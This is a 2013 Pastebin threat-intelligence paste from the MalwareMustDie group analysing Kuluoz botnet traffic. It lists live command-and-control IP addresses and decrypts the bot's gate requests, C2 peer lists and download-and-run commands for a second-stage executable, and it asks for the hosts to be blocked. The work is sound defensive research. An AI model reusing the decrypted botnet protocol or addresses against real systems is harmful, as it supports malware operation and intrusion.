API tools faq
paste
Advertisement
MalwareMustDie

#MalwareMustDie! Kuluoz #Botnet CnC Unleashed (#Tango )

MalwareMustDie
Jul 4th, 2013
4,825
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.89 KB | None | 0 0
raw download clone embed print report
  1. // #MalwareMustDie!!
  2. // @unixfreaxjp /malware]$ date
  3. // Fri Jul 5 00:19:58 JST 2013
  4. // ----------------------------
  5. // Kuluoz botnet communications sniffed TODAY at the below requests from infection PC:
  6. // During the decryption found
  7. - the second payload request (updates)
  8. - Kuluoz botnet private botnet networking
  9. - CnC data.
  10.  
  11. // Today's Requested IP:PROXY form the infected Kuluoz PCs are:
  12.  
  13. 178.208.35.190:8080
  14. 186.112.214.158:8080
  15. 95.140.42.27:8080
  16. 203.146.208.180:8090
  17. 202.29.229.232:8080
  18. 77.92.140.241:8080
  19.  
  20. // Locations...
  21.  
  22. 178.208.35.190 NL Greup, Netherlands 51.7862, 4.4377 Combell Group Nv Combell Group Nv combell.com
  23. 186.112.214.158 CO Bogota D.C., Colombia, 4.6492, -74.0628 Colombia Telecomunicaciones S.A. Esp Telecomunicaciones S.A. Esp
  24. 95.140.42.27 HU Hungary, Europe   47, 20 Szervernet Ltd. Szervernet Ltd.
  25. 203.146.208.180 TH Bangkok, Thailand, Asia 13.754, 100.5014 Loxley Information Company Ltd. CS LoxInfo
  26. 202.29.229.232 TH Thailand, Asia 15, 100 UniNet(Inter-university network) Unspecified Uninet-th
  27. 77.92.140.241 TR Sanayi, Antalya, Turkey, 36.9031,30.6991 Hosting Internet Hizmetleri Sanayi ve Ticaret Anon Hosting Internet Hizmetleri Sanayi ve Ticaret Anon sadecehosting.net
  28.  
  29. // We are recording all requests as per below and decrypting the first three IP
  30. // for the shutdown purpose
  31.  
  32. log.txt(31): h00p://203.146.208.180:8090/cxErZ1nDF6A7F10CFB0D822BD6A442451FF7F6C13E44C2E57D87B6E3C4FDA5455DC4011C16648B6036867F2B52C6BF8443D7533EBD2144838C95B4F4482BC08D5B4EDD1C4691FB5D63
  33. log.txt(35): h00p://203.146.208.180:8090/nXFB1CY2D5D2B54A46DA4A63C19398EBEB87C65335ED99145D0CEE49C0217FEFC14537B77AEA61BAA54E88C5EBE8F33BB77218FDB11EB56E0711183A3905A12F33E664D73D09D4ACB5
  34. log.txt(39): h00p://203.146.208.180:8090/CIov24rb5B9F5B4763E27016CD035F7FCDCA75C17EE2437510D5673C1BBD04E514A2F8BCF78EE618D59427B9C1D64C7702F56E7A69CF90AC733C015B07DAC382622AD5CEC22B72F5
  35. log.txt(43): h00p://203.146.208.180:8090/lzPiZZrB235F17B5B261B27A0B483BFCF8FC269CCED21019300F53F8CC2B001AB9C42EAE0F18215FEE292F4F6DDB8090A2EE580697AE14C58321394303890C37B16EC60456E974209D
  36. log.txt(47): h00p://203.146.208.180:8090/YpITvFiK1C9DD8C10860C4EF8AA5F367A003B2DF0129E09E9BD9A6A28B09C9248D9F44173A6FEFBBA539C5A5781B529C1433B229B8706B589FC9442439BC5F6F10F0B5130B34B82244
  37. log.txt(51): h00p://202.29.229.232:8080/EQqpctxY81BBEBAB855D656245D292F4450405BF3E5F9DA980BBAA1FE39850A5C1EB435EF5684CD7B340C1F196455C2DE68F9DEBBD41DEEED2FED66B450CAD1C02E178E68992FB2EF5
  38. log.txt(56): h00p://178.208.35.190:8080/9A4cfSPd994616860C0D9882494F7EDF4AB098644431D0549A1B0A0011DFEEF4BA360F49376697385C600F92A740674C6051F2DE786376D235BAD61A0B932C3F5D7412FBDE036393AB
  39. log.txt(61): h00p://178.208.35.190:8080/9A4cfSPd994616860C0D9882494F7EDF4AB098644438DE55D34B3B471ED0CED0F8790C066152D3660A046EC7
  40. log.txt(84): h00p://95.140.42.27:8080/WvvUBQ610EC76E893E8D01859561D313435808245F1ED6F2078FEB3E6D78D5050CB189D770B7E66D7B57073F9F6BC6C4A3113A53C8EA8A147B1D261B9AB5D85616CF8371C55C773487
  41. log.txt(96): h00p://95.140.42.27:8080/Yki83XNuEC0BE99C56D912EC410C5E3A11885312593832807508530DCAA6F5DB3D9A902B14B324B66B5B80656E4E60AE09BBF92475FFF25887E3F2FC1F7FD8B5B451E622CAF747F69C
  42. log.txt(101): h00p://95.140.42.27:8080/pjuR8A3eFC05C3D6062AB6DBF00A15A2B1389FAE53CADA146201712150B54E732C57336FEA8CC7A085C0D8963E732FC563557FCF5BD589B67162E97054706912876624996AE68DB8
  43. log.txt(106): h00p://95.140.42.27:8080/tJcKoBSsEDE95904DB7FA2B3EFA8124C03C088C58D1910B95E39D149B6A34BFD842DF390C5A03DAC33929DAE
  44. log.txt(140): h00p://186.112.214.158:8080/L2ZynNQhCABAA843114F2B108A1AA560C7234B4E68D1601E9EF77D90C75275B75E62DAE5EC9B2AB4B545AAC02F808CCF19AD2574E0E6DD53D653D7AE53618586299C84AA89C74AD16F
  45. log.txt(144): h00p://186.112.214.158:8080/dWguhErv004DE435B7C67DB5F8B98F4B6187D6CD771F89A31173BBDE27DED967C13A9606E7EA2872B66E03A40F394FE29EEE6B9B59FDC3E1B31BC60EF0EDD795356D008FE5BD4D6F88
  46. log.txt(148): h00p://186.112.214.158:8080/lpcvWowk243A89131B397A6CC392CA8725FC67F01F51ABA24B842F6FD4C012F50CB5A9FE73C9CECAEDF5C6893C390FF9E55D118AA0EC7855F5DAADCFA6869393BBE189DC62B3B80CE8
  47. log.txt(152): h00p://186.112.214.158:8080/lpcvWowk243A89131B397A6CC392CA8725FC67F01F58A5A302812F7FCEFE0EF641FAAAB170CCDD818AAD80D3
  48. log.txt(175): h00p://186.112.214.158:8080/oU9HTVxTEC2C2A72BFBB8455F713402CB0874EC7BE9A5DB58E36C391E9D0CB9E579040C3894BCF121DDF6BC9
  49.  
  50. // Decryption Report
  51.  
  52. ===============================
  53. 178.208.35.190 NL Greup, Netherlands
  54. ===============================
  55.  
  56. // Kuluoz HTTP Botnet Requests sent are:
  57.  
  58. http://178.208.35.190:8080/9A4cfSPd994616860C0D9882494F7EDF4AB098644431D0549A1B0A0011DFEEF4BA360F49376697385C600F92A740674C6051F2DE786376D235BAD61A0B932C3F5D7412FBDE036393AB
  59.  // decrypted →/index.php?r=gate&id=9A4cfSPd&group=0711rcm&debug=0&ips=192.168.0.128
  60. // response: c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=8e2275d02cfbbddf623f60394bb71926
  61. // 2nd payload: /get/e0e989581b9ab693e0424fe419a17399.exe
  62.  
  63. http://178.208.35.190:8080/9A4cfSPd994616860C0D9882494F7EDF4AB098644438DE55D34B3B471ED0CED0F8790C066152D3660A046EC7
  64.  // decrypted →/index.php?r=gate/getipslist&id=9A4cfSPd
  65. // response:
  66.  
  67. 0000 87 1B 41 CC 5B 44 86 DC 10 0C 71 83 46 EF C3 29 ..A.[D....q.F..)
  68. 0010 18 24 B3 09 92 0C 7A 00 42 97 89 96 F0 22 5F 01 .$....z.B...."_.
  69. 0020 60 23 DF 35 66 66 06 95 FB 12 3B 58 2A 06 A1 9F `#.5ff....;X*...
  70. 0030 31 6F 73 CC 66 F2 95 1F 0A A0 29 26 42 7B 18 FB 1os.f.....)&B{..
  71. 0040 DF 19 62 8F A1 D3 0D E4 01 E0 69 6D D6 BE 29 BB ..b.......im..).
  72. 0050 3F F7 3B 88 82 31 47 A1 2B A7 84 19 CE E8 E2 76 ?.;..1G.+......v
  73. 0060 7E AE 30 CB 79 AD 74 2C F7 43 5E EB BC 90 1A 7B ~.0.y.t,.C^....{
  74. 0070 83 16 94 7F 87 .....
  75.  
  76. // response decrypted, and the data are the CNC lists of this session's Kuluoz...
  77.  
  78. 149.210.130.18:993
  79. 95.140.42.27:8080.
  80. 186.112.214.158:8080.
  81. 77.92.140.241:8080.
  82. 202.29.229.232:8080.
  83. 178.208.35.190:8080.
  84.  
  85. ===============================
  86. 95.140.42.27 Szervernet Hungary
  87. ===============================
  88.  
  89. // Kuluoz HTTP Botnet Requests sent are:
  90.  
  91. http://95.140.42.27:8080/WvvUBQ610EC76E893E8D01859561D313435808245F1ED6F2078FEB3E6D78D5050CB189D770B7E66D7B57073F9F6BC6C4A3113A53C8EA8A147B1D261B9AB5D85616CF8371C55C773487
  92.  
  93. // decrypted (RAW):
  94. 2f 69 6e 64 65 78 2e 70 68 70 3f 72 3d 67 61 74 /index.php?r=gat
  95. 65 26 69 64 3d 57 76 76 55 42 51 36 31 26 67 72 e&id=WvvUBQ61&gr
  96. 6f 75 70 3d 30 37 31 31 72 63 6d 26 64 65 62 75 oup=0711rcm&debu
  97. 67 3d 30 26 69 70 73 3d 31 39 32 2e 31 36 38 2e g=0&ips=192.168.
  98. 30 2e 31 33 37 0.137
  99.  
  100.  // decrypted → /index.php?r=gate&id=WvvUBQ61&group=0711rcm&debug=0&ips=192.168.0.137
  101. // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=733b75728281f1afbe32f725aecf0991
  102.  
  103. http://95.140.42.27:8080/Yki83XNuEC0BE99C56D912EC410C5E3A11885312593832807508530DCAA6F5DB3D9A902B14B324B66B5B80656E4E60AE09BBF92475FFF25887E3F2FC1F7FD8B5B451E622CAF747F69C
  104.  
  105.  // decrypted → /index.php?r=gate&id=Yki83XNu&group=0711rcm&debug=0&ips=192.168.0.128
  106. // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=733b75728281f1afbe32f725aecf0991
  107.  
  108. http://95.140.42.27:8080/pjuR8A3eFC05C3D6062AB6DBF00A15A2B1389FAE53CADA146201712150B54E732C57336FEA8CC7A085C0D8963E732FC563557FCF5BD589B67162E97054706912876624996AE68DB8
  109.  
  110.  // decrypted → /index.php?r=gate&id=pjuR8A3e&group=3006rcm&debug=0&ips=192.168.0.58
  111. // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=733b75728281f1afbe32f725aecf0991
  112.  
  113. http://95.140.42.27:8080/tJcKoBSsEDE95904DB7FA2B3EFA8124C03C088C58D1910B95E39D149B6A34BFD842DF390C5A03DAC33929DAE
  114.  
  115. // response (RAW):
  116. 0000 F3 B4 0E 4E 8C 36 BC ED B6 EB 1D 10 0F 9F D3 88 ...N.6..........
  117. 0010 D1 05 7D E5 1F 7E 90 0E EA E4 0C BB 8C 76 A0 97 ..}..~.......v..
  118. 0020 89 DA 66 D7 56 E1 F6 EB 69 96 24 47 4E 51 E3 AF ..f.V...i.$GNQ..
  119. 0030 4D 74 C5 EE 03 6D 2C D0 9A 8E D2 39 8E 55 69 63 Mt...m,....9.Uic
  120. 0040 5D 85 F7 69 E3 D5 50 3A 84 A7 72 72 D8 8B 0A 39 ]..i..P:..rr...9
  121. 0050 2C 1B 76 30 51 BA 6F 4F 13 10 D2 D9 3E 2F 4A 81 ,.v0Q.oO....>/J.
  122. 0060 F6 91 A8 2D 0C 99 C0 71 06 D3 E6 BD E1 07 89 F4 ...-...q........
  123. 0070 19 99 2C F0 C4 51 B2 C8 D6 55 01 5E 3A 13 CB 92 ..,..Q...U.^:...
  124. 0080 8E E0 1F 1A 1D 58 A5 .....X.
  125.  
  126. // decrypted (RAW):
  127.  
  128. 31 34 39 2e 32 31 30 2e 31 33 30 2e 31 38 3a 39 149.210.130.18:9
  129. 39 33 0a 39 35 2e 31 34 30 2e 34 32 2e 32 37 3a 93.95.140.42.27:
  130. 38 30 38 30 0a 31 38 36 2e 31 31 32 2e 32 31 34 8080.186.112.214
  131. 2e 31 35 38 3a 38 30 38 30 0a 37 37 2e 39 32 2e .158:8080.77.92.
  132. 31 34 30 2e 32 34 31 3a 38 30 38 30 0a 32 30 32 140.241:8080.202
  133. 2e 32 39 2e 32 32 39 2e 32 33 32 3a 38 30 38 30 .29.229.232:8080
  134. 0a 31 37 38 2e 32 30 38 2e 33 35 2e 31 39 30 3a .178.208.35.190:
  135. 38 30 38 30 0a 36 32 2e 31 31 33 2e 32 30 30 2e 8080.62.113.200.
  136. 39 35 3a 39 39 33 0a 95:993.
  137.  
  138. // decrypted response shows CnC:data....
  139. 149.210.130.18:993
  140. 95.140.42.27:8080
  141. 186.112.214.158:8080
  142. 77.92.140.241:8080
  143. 202.29.229.232:8080
  144. 178.208.35.190:8080
  145. 62.113.200.95:993.
  146.  
  147. ===================================================
  148. 186.112.214.158 ColombiaTel Bogota D.C., Colombia
  149. ===================================================
  150.  
  151. // Kuluoz HTTP Botnet Requests sent are:
  152.  
  153. http://186.112.214.158:8080/L2ZynNQhCABAA843114F2B108A1AA560C7234B4E68D1601E9EF77D90C75275B75E62DAE5EC9B2AB4B545AAC02F808CCF19AD2574E0E6DD53D653D7AE53618586299C84AA89C74AD16F
  154.  // decrypted → /index.php?r=gate&id=L2ZynNQh&group=0711rcm&debug=0&ips=192.168.0.128
  155. // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=cbca008e4bc329beb3567020a8d54512
  156.  
  157. http://186.112.214.158:8080/dWguhErv004DE435B7C67DB5F8B98F4B6187D6CD771F89A31173BBDE27DED967C13A9606E7EA2872B66E03A40F394FE29EEE6B9B59FDC3E1B31BC60EF0EDD795356D008FE5BD4D6F88
  158.  // decrypted → /index.php?r=gate&id=dWguhErv&group=0711rcm&debug=0&ips=192.168.0.128
  159. // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=cbca008e4bc329beb3567020a8d54512
  160.  
  161. http://186.112.214.158:8080/lpcvWowk243A89131B397A6CC392CA8725FC67F01F51ABA24B842F6FD4C012F50CB5A9FE73C9CECAEDF5C6893C390FF9E55D118AA0EC7855F5DAADCFA6869393BBE189DC62B3B80CE8
  162.  // decrypted → /index.php?r=gate&id=lpcvWowk&group=0711rcm&debug=0&ips=192.168.0.133
  163. // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=cbca008e4bc329beb3567020a8d54512
  164.  
  165. http://186.112.214.158:8080/lpcvWowk243A89131B397A6CC392CA8725FC67F01F58A5A302812F7FCEFE0EF641FAAAB170CCDD818AAD80D3
  166.  // decrypted → /index.php?r=gate/getipslist&id=lpcvWowk
  167. // response:
  168. 0000 3A 67 DE 59 4C 70 64 32 9A D1 C5 DB 29 A3 3C BD :g.YLpd2....).<.
  169. 0010 43 44 C8 FF 43 C6 6E 38 92 B9 49 B0 49 A1 F9 B6 CD..C.n8..I.I...
  170. 0020 24 8C 86 C7 D7 F3 CF 8E 60 6B 53 ED AF 0A 42 CB $.......`kS...B.
  171. 0030 E9 E0 7D 4B A6 92 EE CA A7 B5 96 8A A4 EE 83 DC ..}K............
  172. 0040 63 A9 B9 11 E9 59 7C 3A 2F EA 6A F3 AB A5 1B 28 c....Y|:/.j....(
  173. 0050 EC D1 9F 05 E4 5A D9 23 CA 5F 33 32 F2 CB A2 A0 .....Z.#._32....
  174. 0060 29 45 4B BF 8E 0C 49 2D 6A 72 32 E5 AB EF 26 30 )EK...I-jr2...&0
  175. 0070 77 82 62 45 C4 84 F6 98 C5 2D C9 B7 14 2E 86 5A w.bE.....-.....Z
  176. 0080 8F F7 EB 57 7F F5 28 ...W..(
  177.  
  178. // decrypted response shows CnC:data....
  179. 149.210.130.18:993
  180. 95.140.42.27:8080
  181. 186.112.214.158:8080
  182. 77.92.140.241:8080
  183. 202.29.229.232:8080
  184. 178.208.35.190:8080
  185. 62.113.200.95:993.
  186.  
  187.  
  188. http://186.112.214.158:8080/oU9HTVxTEC2C2A72BFBB8455F713402CB0874EC7BE9A5DB58E36C391E9D0CB9E579040C3894BCF121DDF6BC9
  189.  // decrypted → /index.php?r=gate/getipslist&id=oU9HTVxT
  190.  
  191. // response:
  192. 0000 F2 71 7D 38 E8 F2 9A 0B AE 50 4F 70 BC D8 15 8A .q}8.....POp....
  193. 0010 E2 86 30 E9 CF 71 82 D6 B5 97 8C D8 5F CB 13 C4 ..0..q......_...
  194. 0020 DE 2E CE 6A 43 B8 2B AB BD 24 D1 EA 17 B5 4A E4 ...jC.+..$....J.
  195. 0030 D1 73 3C 40 EA 7A 87 D4 25 3C 8C BB 36 DB FB B1 .s<@.z..%<..6...
  196. 0040 C1 0D 23 A5 55 BF 2A EF 95 F3 AD ED F0 11 5D 26 ..#.U.*.......]&
  197. 0050 01 C6 14 7B 4F 8A DA 55 69 4C 73 2B DF B8 6B 53 ...{O..UiLs+..kS
  198. 0060 5F 5F 44 7D BA 2C F1 83 EC 0F F5 38 D6 B8 53 00 __D}.,.....8..S.
  199. 0070 BC BF B2 94 9B 8B E9 80 A8 30 BE 0A 4C 9B 53 96 .........0..L.S.
  200. 0080 33 6C 5A 00 46 6B D8 3lZ.Fk.
  201.  
  202. // decrypted response shows CnC:data....
  203. 149.210.130.18:993
  204. 95.140.42.27:8080
  205. 186.112.214.158:8080
  206. 77.92.140.241:8080
  207. 202.29.229.232:8080
  208. 178.208.35.190:8080
  209. 62.113.200.95:993.
  210.  
  211.  
  212. // Verdicted as per evidence above,
  213. // Please help to shutdown or block these malicous traffic.
  214.  
  215. ---
  216. #MalwareMustDie!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!